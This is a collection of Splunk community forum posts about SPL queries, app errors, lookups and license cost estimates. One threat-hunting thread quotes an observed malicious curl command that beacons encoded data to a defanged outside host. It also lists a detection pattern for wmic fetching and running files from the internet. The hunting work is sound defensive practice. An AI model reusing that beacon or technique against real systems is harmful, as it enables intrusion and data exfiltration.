All Posts

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.


Hi, I'm working on creating a dashboard, but I'm not familiar with time formatting. Can someone help me format the time with strftime in this search so it displays on the dashboard?

index=a sourcetype=b earliest=-30d [| inputlookup LU0_siem_asset_list where f_id=*OS-03* | stats values(asset) as search | eval search=mvjoin(search, ", OR ")] | fields src src_ip src_f_id _time | stats latest(_time) values(*) by src_ip

Thanks!
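One possible way to do this (a sketch, not tested against this data, with an assumed output format of "%Y-%m-%d %H:%M:%S") is to give the latest(_time) aggregation a name and convert that epoch value with an eval afterwards:

```
index=a sourcetype=b earliest=-30d
    [| inputlookup LU0_siem_asset_list where f_id=*OS-03*
    | stats values(asset) as search
    | eval search=mvjoin(search, ", OR ")]
| fields src src_ip src_f_id _time
| stats latest(_time) AS latest_time values(*) by src_ip
| eval latest_time = strftime(latest_time, "%Y-%m-%d %H:%M:%S")
```

Any strftime format string can be substituted; the key point is that strftime takes the numeric epoch value produced by stats and returns a display string.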
We have been using the SentinelOne App for Splunk Cloud for over a year; lately we are getting the error below. Tried regenerating the API key, no joy.

error_message="[HTTP 404] https://127.0.0.1:8089/servicesNS/nobody/sentinelone_app_for_splunk/configs/conf-authhosts/278c8-73f2-d67a-0211-782344bd8727?output_mode=json" error_type="<class 'splunk.ResourceNotFound'>" error_arguments="[HTTP 404] https://127.0.0.1:8089/servicesNS/nobody/sentinelone_app_for_splunk/configs/conf-authhosts/278c8-73f2-d67a-0211-782344bd8727?output_mode=json" error_filename="s1_client.py" error_line_number="164" input_guid="f6cf841-8787-761-d820-d0d36cebfa" input_name="Activity"

Error filename: s1_client.py
Error line number: 164
Input guid: f6cf841-8787-761-d820-d0d36cebfa
Message: [HTTP 404] https://127.0.0.1:8089/servicesNS/nobody/sentinelone_app_for_splunk/configs/conf-authhosts/278c8-73f2-d67a-0211-782344bd8727?output_mode=json
Hello @sajo.sam,

The error message you've encountered, "agentregistrationmodule.go:132 - clusterId: -1", indicates that the cluster agent received incorrect controller information or that the controller is rejecting the registration. To verify that you've configured the correct controller access key, you can execute the following command:

kubectl get secret cluster-agent-secret -n appdynamics -o jsonpath='{.data.controller-key}' | base64 --decode

Please note: do NOT share any sensitive controller information on this public platform.

Regarding the error mentioned in your comments:

[ERROR]: 2024-04-09 11:21:08 - agentregistrationmodule.go:131 - Failed to send agent registration request: Post "accountname.saas.appdynamics.com:8080/sim/v2/agent/clusterRegistration": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

This is likely due to a network connection issue. You can check the network connection from one of the running pods using the following command:

curl -v -k -u singularity-agent@<accountname> https://<controllerhost>.saas.appdynamics.com:<port>/sim/v2/agent/clusterRegistration

Please check the above and let us know if it helps.

Best Regards,
Rajesh Ganapavarapu
I think you should open a support ticket for this.
Hi. I have a lookup file with phone numbers broken down into their parts, so:

cc,npa,nxx,list
1,210,5551234,good
1,512,7779876,bad

My event stream has E.164 phone numbers, so:

+12105551234
+15127779876

I'd like to use the lookup command, but can't find a way to natively join this data, and I'm looking for ideas. Currently I am able to use join, like this:

... | join number [| inputlookup lookupfile.csv | eval number="+".cc.npa.nxx | fields number list]

But I've learned through this group to mostly try and avoid join because of its limitations, and because "it's basically applying SQL and this ain't SQL". I thought about breaking apart the number field into three fields and then passing several lookups, as in the example page linked above, but that feels backwards when what I'd prefer to do is join the data in the CSV. Another idea was to create a report that does the join and creates a new CSV (| outputlookup), but that feels unnecessary, too. Any thoughts? THANK YOU!
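One join-free sketch (file and field names here are assumptions): materialize the concatenated number into a second lookup file with a scheduled search, then use a plain lookup in the event search.

```
| inputlookup lookupfile.csv
| eval number="+".cc.npa.nxx
| fields number list
| outputlookup e164_list.csv
```

The event search then becomes simply `... | lookup e164_list.csv number OUTPUT list`, which avoids join's subsearch row limits. The trade-off is keeping the derived CSV in sync with the source lookup, which is why a scheduled search is suggested.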
It says `No results found.`
Hi @Glasses2, did you find a way to do this? I have the same scenario for the migration.
Once you have your base cost per day query, you can then add this to build a predictive panel:

[...] | timechart span=1d count(status) as "Error Status Count" | predict "Error Status Count" future_timespan=7

where [...] is your base query; replace 7 with the number of days you want to predict. This would allow you to take into account changes in the already ingested data.
We use this query to build our total daily ingest over a rolling 30 days:

index=_internal source=*license_usage.log type="RolloverSummary" earliest=-30d@d
| eval _time=_time - 43200
| bin _time span=1d
| stats latest(b) AS b by slave, pool, _time
| timechart span=1d sum(b) AS "Daily Usage" fixedrange=false
| fields - _timediff
| foreach * [eval <<FIELD>>=round('<<FIELD>>'/1024/1024/1024, 3)]
| eval license_threshold = 1000
Could you not divide your cost by the amount of data you are licensed to ingest, and use that as an estimated cost per, say, MB? Then run a query that shows you the usage by day over 30 days, and add a daily usage * cost per MB column to get your estimated daily cost.
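A minimal sketch of that arithmetic against the license usage logs. The cost_per_mb value here is a made-up placeholder rate (your total license cost divided by your licensed MB), not a real figure:

```
index=_internal source=*license_usage.log type="RolloverSummary" earliest=-30d@d
| bin _time span=1d
| stats sum(b) AS bytes by _time
| eval daily_mb = round(bytes/1024/1024, 2)
| eval cost_per_mb = 0.005
| eval estimated_daily_cost = round(daily_mb * cost_per_mb, 2)
| table _time daily_mb estimated_daily_cost
```

This yields only an estimate, since actual license pricing is usually tiered rather than strictly linear per MB.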
I need to see all events with fields that have "PROD*" in the name, e.g. "PROD deploy", "PROD update", etc. `index=myIndex sourcetype=mySourceType "PROD*"="*"` doesn't work. And if an event has a "PROD*" field name, I need to get its value. How can this be done?
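One possible approach (a sketch, not tested against this data, assuming the field names literally start with "PROD") is `foreach` with a wildcard, which iterates over matching fields and copies the first non-null name/value pair into common fields:

```
index=myIndex sourcetype=mySourceType
| foreach PROD* [ eval prod_field=coalesce(prod_field, "<<FIELD>>"), prod_value=coalesce(prod_value, '<<FIELD>>') ]
| where isnotnull(prod_value)
| table _time prod_field prod_value
```

The single-quoted '<<FIELD>>' reads the field's value (and tolerates spaces in the name), while the double-quoted "<<FIELD>>" captures the field's name as a string.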
Hi all, I've a CSV file with 3 columns (ip, earliest, latest) and over 400 rows. I'm trying to return all events associated with each IP for an hour before and after the interesting request time. The search below works for a single row, but I can't figure out how to treat each row as a unique search and compile the results at the end. What appears to happen when I upload multiple rows in the CSV is that the search runs for all interesting IPs from the earliest earliest value to the latest latest value. It kind of meets the intent, but it is very wasteful, as the index is huge and the times span several years with days/months between them. Is what I'm trying to achieve possible?

index=myindex client_ip_address earliest latest
    [| inputlookup ip_list_2.csv
    | eval ip = "*" . 'Extracted IP' . "*"
    | eval earliest=strptime('REQUEST_TIME', "%m/%d/%y %H:%M")-(60*60)
    | eval latest=strptime('REQUEST_TIME', "%m/%d/%y %H:%M")+(60*60)
    | fields ip earliest latest ]
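If a genuinely separate time range per row is required, the `map` command can run one search per lookup row (a sketch only; map is expensive, its default maxsearches is 10, so it must be raised for 400+ rows, and the field/column names below are taken from the post):

```
| inputlookup ip_list_2.csv
| rename "Extracted IP" AS ip
| eval earliest=strptime('REQUEST_TIME', "%m/%d/%y %H:%M")-3600
| eval latest=strptime('REQUEST_TIME', "%m/%d/%y %H:%M")+3600
| map maxsearches=500 search="search index=myindex client_ip_address=*$ip$* earliest=$earliest$ latest=$latest$"
```

Each $token$ is substituted from the corresponding row before the inner search runs, so every IP gets its own two-hour window instead of one window spanning all rows.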
@dude49, You would need a field or value that gives you the hire/start date, then compare it against now() to look for the last 30 days. Something like the below (assuming hire_date is in epoch time; subtracting day-of-month values would break across month boundaries):

| eval window = floor((now() - hire_date) / 86400)
| where window < 30

Reference: https://docs.splunk.com/Documentation/SCS/current/SearchReference/DateandTimeFunctions
Hi - To explain: we have an ioc_check table with over 100 commands, and we are matching these commands against the CrowdStrike CommandLine field from a hunting perspective. This is the SPL we have, which alerts us when CommandLine matches a commands string from the lookup table:

index=crowdstrike event_simpleName=ProcessRollup2
    [| inputlookup ioc_check
    | eval CommandLine="*"+commands+"*"
    | fields CommandLine]
| lookup ioc_check commands AS CommandLine OUTPUT description
| table CommandLine, commands, description

The result we are getting:

CommandLine: curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhW...
commands: (blank)
description: (blank)

However, the result we want is this:

CommandLine: curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhW...
commands: *wmic*get*http*
description: Using wmic to get and run files from internet

Also, we have Global permissions to All apps for both the lookup table and the lookup definition.
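One likely cause of the blank columns: by default a lookup does exact matching, so wildcard patterns stored in the commands field never match a full CommandLine. A possible fix (a sketch; the stanza and file names are assumed from the post) is to give the lookup definition a WILDCARD match type in transforms.conf:

```
[ioc_check]
filename = ioc_check.csv
match_type = WILDCARD(commands)
max_matches = 1
```

With this in place, `| lookup ioc_check commands AS CommandLine OUTPUT description` can treat each commands value such as *wmic*get*http* as a pattern rather than a literal string.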
I have been asked to alert when a user deletes an index. I have found the event in the _internal index, but there is no username attached to the event:

index=_internal event=removeIndex

05-13-2024 21:57:01.509 +0000 INFO IndexProcessor [1036423 indexerPipe_1] - event=removeIndex index=deleteme is newly marked for deletion, avoided restart

There does not appear to be a corresponding event in the _audit index, so I'm drawing a blank on how to attribute the event to a user account. The solution provided here doesn't appear to work, as I'm not seeing an operations or object field in the _audit index.
 
I am not sure I understand - if it matches, what gets returned? Also, what permissions/scope do you have on your lookup file and lookup definition? (Make sure they are accessible by all apps.)
@tscroggins @VatsalJagani Thanks for sharing the reference links. I am very close to setting up the secure SSL connection using OpenSSL. Once it's completely done, I will share the complete steps here as well.
Yes, it does match, but I am struggling with displaying the command and description in the final result. Per my logic above, when I use | table CommandLine, commands, description it just displays CommandLine, and the commands and description columns come back blank.
I have not personally tried this API, but based on the API doc, you can try it and then ask a follow-up question based on any errors it generates. Or you can even create a Splunk Support ticket if something is not working as described in the doc.